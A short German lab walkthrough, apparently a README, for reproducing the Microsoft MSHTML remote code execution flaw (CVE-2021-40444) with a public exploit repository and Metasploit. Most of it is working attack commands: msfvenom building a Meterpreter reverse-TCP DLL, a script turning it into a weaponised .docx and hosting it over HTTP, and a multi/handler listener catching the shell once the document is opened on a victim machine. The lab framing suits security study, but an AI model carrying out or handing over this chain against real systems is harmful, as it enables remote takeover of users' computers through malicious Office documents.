
Ein Versuch, die Microsoft MSHTML Remote Code Execution (RCE) Schwachstelle zu reproduzieren und das Metasploit Framework zu verwenden.
Ein Versuch, die Microsoft MSHTML Remote Code Execution (RCE) Schwachstelle mit dem Metasploit Framework nachzubilden.
funktioniert am besten, wenn nicht in FlareVM ausgeführt
Klonen Sie das Repository von https://github.com/lockedbyte/CVE-2021-40444
Bereiten Sie die .dll Vorlage vor, die später mit msfvenom verwendet wird
msfvenom -p windows/meterpreter/reverse_tcp lhost=<SOURCE_IP> lport=<LISTENING_PORT> -f dll -o template.dll
Kopieren Sie die gerade erstellte template.dll in den Ordner test/ des Repositorys
Erteilen Sie der template.dll Ausführungsrechte mit chmod +x template.dll
Führen Sie das Skript aus, um die template.dll zu verarbeiten und in output zu exportieren
python3 exploit.py generate ~/test/template.dll http://<SOURCE IP>
Das Dokument wird dann in den Ordner out/ exportiert und wir können einen Listener auf unserem HTTP-Port (Standard ist 80) einrichten
python3 exploit.py host 80
Führen Sie metasploit aus mit
msfconsole -q
use multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost <SOURCE IP>
run
Dann können wir das document.docx an unsere verwundbare Maschine senden und die .docx ausführen
Wir erhalten eine Antwort im exploit.py-Terminal und das Labor ist erfolgreich, wenn wir eine Reverse-TCP-Shell starten können.